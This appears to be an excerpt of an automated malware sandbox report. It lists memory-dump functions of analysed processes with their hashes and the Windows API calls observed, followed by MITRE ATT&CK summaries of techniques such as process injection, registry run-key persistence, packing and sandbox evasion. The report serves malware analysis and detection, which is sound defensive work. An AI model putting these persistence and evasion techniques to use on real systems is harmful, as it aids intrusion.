Instruction ID: e1179afa165f8f4f5027797215b3de85f8c403eeb0261cc57d979da7ee459960
Opcode Fuzzy Hash: 0bb47931697478adab12face32f23f3e287f7b88a15b5f112ada18899383a87f
Instruction Fuzzy Hash: B1E04F3921E3948FC703AB74E8948943FB59B4A21031585D7D889CF7B3C5209C56DB22

Uniqueness

Uniqueness Score: -1.00%

Function 042C6398, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208606235.00000000042C0000.00000040.00000001.sdmp, Offset: 042C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8852ce50ffbf35345aa8abfcecdcffcf40bac52f7f0ebda2f4c77da1584ddadf
Instruction ID: c8776fe59c1162fcaca98a90d1b829147c4b46ece729a7c70a16768a9a201c68
Opcode Fuzzy Hash: 8852ce50ffbf35345aa8abfcecdcffcf40bac52f7f0ebda2f4c77da1584ddadf
Instruction Fuzzy Hash: C0E08670510208DBCB00EFF4DA0458D77B9AB01309F104569C40C93251EF311A449B61

Uniqueness

Uniqueness Score: -1.00%

Function 001D2CA8, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207575623.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de3c38ee18833f2abbdd94eda0a46e9c6688cbd433a10ec61647e9214503708d
Instruction ID: 8df2ff9571dc09e8aa1be25ad54d3cd2aad5a1766bf5a01bc09574063207b279
Opcode Fuzzy Hash: de3c38ee18833f2abbdd94eda0a46e9c6688cbd433a10ec61647e9214503708d
Instruction Fuzzy Hash: 0CE08630509561DBEF0D9B24CC251257B71AF22308B150197C8658B232D7344C46D787

Uniqueness

Uniqueness Score: -1.00%

Function 042C7470, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208606235.00000000042C0000.00000040.00000001.sdmp, Offset: 042C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 234493ec22ed92dbfe0b402aa387fb0f9172d33fee2cc9188342cb7f3a1b45ef
Instruction ID: 049610e1d7a292f742af9dfa14cab983e3db5af67d7435a5cf912b498ea94ad8
Opcode Fuzzy Hash: 234493ec22ed92dbfe0b402aa387fb0f9172d33fee2cc9188342cb7f3a1b45ef
Instruction Fuzzy Hash: E4D05E30628249DBC714CBD5D800A69F7BCDB86308F10819CC80C93382DA72AD42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001D2D30, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207575623.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5976677ce33df43484cc10021d6c72161fda90c41a11eb03f6675a3f88ddcd09
Instruction ID: 278b44624ba911459ea5e1d46ca5934c08f6f613218871da82d5df5b44219a06
Opcode Fuzzy Hash: 5976677ce33df43484cc10021d6c72161fda90c41a11eb03f6675a3f88ddcd09
Instruction Fuzzy Hash: CDD0A974608610CAE70CEF18EC112253672FFA0304F12822AD02E4B664EB306EC68B92

Uniqueness

Uniqueness Score: -1.00%

Function 001D0541, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207575623.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df98365734c30b76e560a8e20d66272aa45694ef2b88dc2f9528c93194225027
Instruction ID: b872195f57020fb72afb12572d5d0a6370dc7c021f14434e61e9fcf233ac0fde
Opcode Fuzzy Hash: df98365734c30b76e560a8e20d66272aa45694ef2b88dc2f9528c93194225027
Instruction Fuzzy Hash: B5C0080B54E3D05FCB2342E02DA65E03F70684312138E52D78589FA5A79A0D8B8C8332

Uniqueness

Uniqueness Score: -1.00%

Function 001D1941, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207575623.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b84205c52d4b6b9f2ad01023df8cdeaeb1eafd0c3df456e1d0481b90014c8f08
Instruction ID: af5ce587aa77937f3212dc91c9fd4bac508b37c62e449c4aa657a9c7b96e828a
Opcode Fuzzy Hash: b84205c52d4b6b9f2ad01023df8cdeaeb1eafd0c3df456e1d0481b90014c8f08
Instruction Fuzzy Hash: D0C0022560E7C18FC30387649CA46407F31AE8310639E41D3C585DB1AAD3281928C772

Uniqueness

Uniqueness Score: -1.00%

Function 001D2940, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207575623.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7202a9b89ba2cfbd04184d1d9a9a62edfff79e4b18bbee89a54295a6fb02dce
Instruction ID: 18672d55a6367d5a9c6ca2ddcd75d7a891f582caf6103c0a17bea007d9008761
Opcode Fuzzy Hash: f7202a9b89ba2cfbd04184d1d9a9a62edfff79e4b18bbee89a54295a6fb02dce
Instruction Fuzzy Hash: B8C0012A42E3C08FCB23133458281903FB86C1350278E02E3D892DB1A7E2489D2987B2

Uniqueness

Uniqueness Score: -1.00%

Function 001D3DA0, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207575623.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97c75961935e1a904744d5074bdeae5565cbecdd3df5c57d514f52ece7f47b21
Instruction ID: 00d92a2e7fbfde6d93379c7bf65fa59b9d6640a469fe90fa9161d2e2eab94378
Opcode Fuzzy Hash: 97c75961935e1a904744d5074bdeae5565cbecdd3df5c57d514f52ece7f47b21
Instruction Fuzzy Hash: CDC04C30055B1487C7142BE5BD0C365B7B95745727F508011D51D429B28F7058D4CE66

Uniqueness

Uniqueness Score: -1.00%

Function 001D1BC8, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207575623.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b120ca18f0c242a5a2fb8f400f31753fd56989604599b6c19626405def68d481
Instruction ID: e2ccbf32615d070b9bb7efbdcc7d037f7d6a8373e63273fdf992cefa92c75bef
Opcode Fuzzy Hash: b120ca18f0c242a5a2fb8f400f31753fd56989604599b6c19626405def68d481
Instruction Fuzzy Hash: AED0EAB4C09208EEDB80EFBD860539DBAF4AB08300F6085AB8418E3241F3B456459B81

Uniqueness

Uniqueness Score: -1.00%

Function 001D2497, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207575623.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 938d3084658f6f1a7032a782b0059e95e44894f24de72b783f581f52d07799bd
Instruction ID: 0e19ca0a5d25c706f6d5fb8369454976662fe769f7ec8bf12aeebbc34bef09d9
Opcode Fuzzy Hash: 938d3084658f6f1a7032a782b0059e95e44894f24de72b783f581f52d07799bd
Instruction Fuzzy Hash: 85B0127BF1A0089E8B00D6D4F9414DCF336EFD4235F104033E3115200087311E38C660

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001D3DD0, Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

@2Cm, xrefs: 001D3FE0

Memory Dump Source

Source File: 00000004.00000002.2207575623.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID:
String ID: @2Cm
API String ID: 0-1978185724
Opcode ID: 6d59a18a3436ca15029f68f496e461d3f18f9d473929b92ed628a474443eecf7
Instruction ID: 52ae0978c577a193eaa12b1f87be05c85c56b2cc1cb95412233b1f94e11cdc7a
Opcode Fuzzy Hash: 6d59a18a3436ca15029f68f496e461d3f18f9d473929b92ed628a474443eecf7
Instruction Fuzzy Hash: 65815E709046188FD748EFAAE984A8EBBF3AFC8304F14C539D0199B769EB345995CF50

Uniqueness

Uniqueness Score: -1.00%

Function 042CF730, Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208606235.00000000042C0000.00000040.00000001.sdmp, Offset: 042C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce75f50eb2d979b28e0728b1d116aa050d73496d959a34e66aa89cee91e2a028
Instruction ID: fe9b0bbfc6d7b821e46407f0c5ce717ecea156356cbb538febbc765f5d28ceb5
Opcode Fuzzy Hash: ce75f50eb2d979b28e0728b1d116aa050d73496d959a34e66aa89cee91e2a028
Instruction Fuzzy Hash: 2A22C371E106198BDB18CFAAC98069DFBF2FF88304F24C669D419EB259D730A942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04A00048, Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208936656.0000000004A00000.00000040.00000001.sdmp, Offset: 04A00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7ac258673f0737aa75ff60240f2dda2e57d5dcaceaacccfac70af250aa0273f
Instruction ID: 2f47c49aa014059a74140f6fd643065817b7318de38a48d4903d213ad820cf67
Opcode Fuzzy Hash: b7ac258673f0737aa75ff60240f2dda2e57d5dcaceaacccfac70af250aa0273f
Instruction Fuzzy Hash: 8F514FB1D456188BEB2CCF6B9D447CAFAF7AFC9300F14C1F9951CA6255EB740A858E40

Uniqueness

Uniqueness Score: -1.00%

Function 04A0D6E0, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208936656.0000000004A00000.00000040.00000001.sdmp, Offset: 04A00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddcf8a6b938f780a027f3270ab463211ab66dd2d494207fa93fcede36d0d91d6
Instruction ID: 8a63b6fae34e9a31c9524f4285dab3d89f5665cc85cb856a733323e7da6fd9c0
Opcode Fuzzy Hash: ddcf8a6b938f780a027f3270ab463211ab66dd2d494207fa93fcede36d0d91d6
Instruction Fuzzy Hash: B741CEB5D002489FDB10CFE9E984BAEFBF1BB49304F249529E415BB290D774A849CF85

Uniqueness

Uniqueness Score: -1.00%

Function 042C0048, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208606235.00000000042C0000.00000040.00000001.sdmp, Offset: 042C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c619705d8bc7a125c248547715c60e24e79adf74273c2faeb537173ac0749308
Instruction ID: 84fd27b986a4c2fbf3691a022a52abe8790d8d8aa24067eb0cb0d3bfe5b2519e
Opcode Fuzzy Hash: c619705d8bc7a125c248547715c60e24e79adf74273c2faeb537173ac0749308
Instruction Fuzzy Hash: 1D4166B1E046588BEB58CF6BCC4479EFAF7AFC8304F14C5A9C40DA6264DB7519958F10

Uniqueness

Uniqueness Score: -1.00%

Function 00431B97, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef7eaebf6fb3f89977400dcb51d5f4949d0e83f74d729bcaf9fc73e1f8bab4cb
Instruction ID: b447eea823a46b48d077350c1d365a89916dcfe0ac07e1595faa779e11148b8c
Opcode Fuzzy Hash: ef7eaebf6fb3f89977400dcb51d5f4949d0e83f74d729bcaf9fc73e1f8bab4cb
Instruction Fuzzy Hash: 0A310171D096948FDB2ACF6B8C506D9BFF7AF89300F04D1E7C448AA266D6340A46CF11

Uniqueness

Uniqueness Score: -1.00%

Function 042C0044, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208606235.00000000042C0000.00000040.00000001.sdmp, Offset: 042C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0e01a00b4ee083db62539530a31fd3277b7a287013b89f89adfd8588918d93e
Instruction ID: dc0826303f90c378d41966fc9d1369fb80ad58b044a11062522167b6d333bc42
Opcode Fuzzy Hash: f0e01a00b4ee083db62539530a31fd3277b7a287013b89f89adfd8588918d93e
Instruction Fuzzy Hash: 323137B1E056588BEB58CF6BCD5478EFAF3AFC8304F14C1A9C41CA6264DB7519968F10

Uniqueness

Uniqueness Score: -1.00%

Function 00431C02, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d192cb748af77121c456dc09b528da6c4d76673b7022c86318b78d7aa5fc345
Instruction ID: a7a8cba8f01a917cc054e70414aeedf82d45b6da971b1b211748a1568e59ad78
Opcode Fuzzy Hash: 4d192cb748af77121c456dc09b528da6c4d76673b7022c86318b78d7aa5fc345
Instruction Fuzzy Hash: BD21CD71D196988BDB2ACF6B8C506D9BAF7AFC9300F04D1FAD448AB265D6340A85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00431C20, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3f523ac825c25fbbe8c2d62d37a60a2ac5d2628f6c9ccd3844d7597a06c4da
Instruction ID: 3d597bf1128f1cea7784c1c8fc4158d767ab441ce0bc57507139c71a90246a9e
Opcode Fuzzy Hash: 1c3f523ac825c25fbbe8c2d62d37a60a2ac5d2628f6c9ccd3844d7597a06c4da
Instruction Fuzzy Hash: 9321CC71D14668CBDB29CF6B8C4479AF6FBAFC9301F14D1AA940CAB254DB701A85CF44

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 2164 Parent PID: 1616 RegAsm.exeCOMMON

Executed Functions

Function 003554E0, Relevance: 1.7, APIs: 1, Instructions: 187registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,003559C9,00020119,00000000,00000000,?), ref: 00355D9F

Memory Dump Source

Source File: 00000005.00000002.2363361793.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ef96563b7f41aa4be40992cfe7b2fcb61fb5f61c8566da9e0942517ba6f2f113
Instruction ID: f4b7ded7ee0e6278da425a42336073e6738b0b730684a5ee8806ab21231c2725
Opcode Fuzzy Hash: ef96563b7f41aa4be40992cfe7b2fcb61fb5f61c8566da9e0942517ba6f2f113
Instruction Fuzzy Hash: 3A715671D006199FDB15CFA8C895BEEBBB1BF48315F258029E819A7360DB70A885CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00CD8484, Relevance: 1.6, APIs: 1, Instructions: 142networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 00CD9090

Memory Dump Source

Source File: 00000005.00000002.2363958832.0000000000CD0000.00000040.00000001.sdmp, Offset: 00CD0000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: eae7ea45e0784bac148cbf2e875603efb18bcabdef5dd61bdff5d88b3eb18117
Instruction ID: c993a8a11b935f8c5ee1e0e5f1b719e03db9c6f9ad0276f5ed3cdaa30bc8d39b
Opcode Fuzzy Hash: eae7ea45e0784bac148cbf2e875603efb18bcabdef5dd61bdff5d88b3eb18117
Instruction Fuzzy Hash: 4B5101B0D002599FCF10DFA9D8856DEBBB5FF48304F24852AE919AB350DB70A946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00CD8F67, Relevance: 1.6, APIs: 1, Instructions: 139networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 00CD9090

Memory Dump Source

Source File: 00000005.00000002.2363958832.0000000000CD0000.00000040.00000001.sdmp, Offset: 00CD0000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 3ffa46e66a5a52199628da3266b85951ba8a3002d1af39ed3725cec2b9106333
Instruction ID: ee97ec7d1267fe6950592862834bfd9606a8a56ed938a7995decab502a153d1f
Opcode Fuzzy Hash: 3ffa46e66a5a52199628da3266b85951ba8a3002d1af39ed3725cec2b9106333
Instruction Fuzzy Hash: 995103B4D002599FCF10CFA9D8856DEBBB1FF48304F24852AE919AB350DB70A946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00351484, Relevance: 1.6, APIs: 1, Instructions: 102registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,?,00000000,?,?), ref: 00355B47

Memory Dump Source

Source File: 00000005.00000002.2363361793.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 7d8d1130ded912e48a2d2a3d3761c0cd88307770bbff2c2e0b31e92fc9d54582
Instruction ID: a922273054ba2ca162bb4aececd78a675ecca71a6fb559ab5db39051dc0a641c
Opcode Fuzzy Hash: 7d8d1130ded912e48a2d2a3d3761c0cd88307770bbff2c2e0b31e92fc9d54582
Instruction Fuzzy Hash: 7F4156B0D0064C9FCB11CF99D894B9EFBB1FF48304F24812AE818A7260D774A845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00355A5E, Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,?,00000000,?,?), ref: 00355B47

Memory Dump Source

Source File: 00000005.00000002.2363361793.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ddf7f11ef73be4eea209b855a091aaf21cd4614cb36e82e52b81993e4971205
Instruction ID: 520304a9d9c8f354b2afe314bb1ff19c26bf06410e561e9eee73e1168e82a4eb
Opcode Fuzzy Hash: 8ddf7f11ef73be4eea209b855a091aaf21cd4614cb36e82e52b81993e4971205
Instruction Fuzzy Hash: FD4144B1D006589FCB11CFA9D895B9EFBB1FF48314F24852AE818AB260D774A845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00357428, Relevance: 1.6, APIs: 1, Instructions: 94fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?), ref: 003574FC

Memory Dump Source

Source File: 00000005.00000002.2363361793.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 2cf5fa94e29d93493fb6279cd05a91d5c4fba7ba71487de81a55c170cac5a573
Instruction ID: fed2dfe381a1ee8cf1f4f36d8cc8d49b5546f8c8c8d8934d42573620f1ce9f7b
Opcode Fuzzy Hash: 2cf5fa94e29d93493fb6279cd05a91d5c4fba7ba71487de81a55c170cac5a573
Instruction Fuzzy Hash: 4B4156B0D042588FDB11CFAAD845B9EFBF6AF48305F20852AD818A7350E7749849CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00355E78, Relevance: 1.5, APIs: 1, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(00000000), ref: 00355EDF

Memory Dump Source

Source File: 00000005.00000002.2363361793.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6bb1f339e8e2ef3c89061455ba064d2b55c5d7bae5ca72cbbc33c9dbb5a343a1
Instruction ID: cc735ed74a93f09373906b20990016ce59051671b4d3b78996f050cf54647507
Opcode Fuzzy Hash: 6bb1f339e8e2ef3c89061455ba064d2b55c5d7bae5ca72cbbc33c9dbb5a343a1
Instruction Fuzzy Hash: AB1116B5C006499FCB10CF99D445BDEFBF8EF89314F20885AD568A7250C775A948CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 003554EC, Relevance: 1.5, APIs: 1, Instructions: 48registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(00000000), ref: 00355EDF

Memory Dump Source

Source File: 00000005.00000002.2363361793.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: bde992d1469e7f709305f4e83653c1256db2b0ee378f6ef75dc8bb30b08fb869
Instruction ID: 96d9bb959b3614a43352dfaad280f1381f0298320b7ac03f3e9ff6a10690b0c3
Opcode Fuzzy Hash: bde992d1469e7f709305f4e83653c1256db2b0ee378f6ef75dc8bb30b08fb869
Instruction Fuzzy Hash: 761113B1900609CFCB20CF99D445BEEFBF8EB48314F20841AD969A7310D7B5A948CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00356000, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0035605C

Memory Dump Source

Source File: 00000005.00000002.2363361793.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 78e763c8a4fc09a327e39ade780034ab205002bd7969776841644fe7b29914a4
Instruction ID: 9d1c3c2c25512ce65d3a5e87ad5a54557d75514c4ece4dd052c4039da18b63c9
Opcode Fuzzy Hash: 78e763c8a4fc09a327e39ade780034ab205002bd7969776841644fe7b29914a4
Instruction Fuzzy Hash: 2C1100B5C002098FCB20CF99D449BDEFBF4EB48314F20881AC968A3350D779A948CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001BD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2363289965.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 076b7ba16b90f13b86cf06f475ad9a63534f4c288a0dcea6a62fbd7cc7d56d7e
Instruction ID: fa0b093ca15e2c34f350287028815adc5f8f5a9b109891b3afdc0e55023dd894
Opcode Fuzzy Hash: 076b7ba16b90f13b86cf06f475ad9a63534f4c288a0dcea6a62fbd7cc7d56d7e
Instruction Fuzzy Hash: 7621F275604344DFCB18EF64E884B56BBA5EB88314F34C9A9E8094B346D33AD807CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001BD1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2363289965.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42f440d855245d2b78896d208cf6a3440a6927bed8770e797a2ecb5b499c6a9a
Instruction ID: c565430a3e510996f45a019e98a9beeb1171f933dfd3f183ad9595bffcd5bc22
Opcode Fuzzy Hash: 42f440d855245d2b78896d208cf6a3440a6927bed8770e797a2ecb5b499c6a9a
Instruction Fuzzy Hash: 54210775604284DFDB09DF54E5C0B56BBA5FB84314F30C9ADE8094B342D336D806CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001BD006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2363289965.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ada5df3572db29fc4d3db6d9563c991bc211f09d6a6e5dbb9c0f9efd8602e5e6
Instruction ID: 34cd618b68a7a17f32c8256c336ad19b2ce167afd5ba8080d38778d1dbf76d34
Opcode Fuzzy Hash: ada5df3572db29fc4d3db6d9563c991bc211f09d6a6e5dbb9c0f9efd8602e5e6
Instruction Fuzzy Hash: C72180754083809FCB06DF14D994B15BFB1EB46314F28C5DAD8498F267D33AD816CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001BD1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2363289965.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e8fee7be0f4f510d8963cdb40196c8bb7ac993b5cbc29ff42f4d3fe7c9977c4
Instruction ID: 75c976224e66e6543c903715ef0526be04343bab485613e0a7f4ba2a98d54de1
Opcode Fuzzy Hash: 6e8fee7be0f4f510d8963cdb40196c8bb7ac993b5cbc29ff42f4d3fe7c9977c4
Instruction Fuzzy Hash: 55119A79904280DFCB16CF14E5C4B55FFA1FB84314F28C6AED8494B656D33AD84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

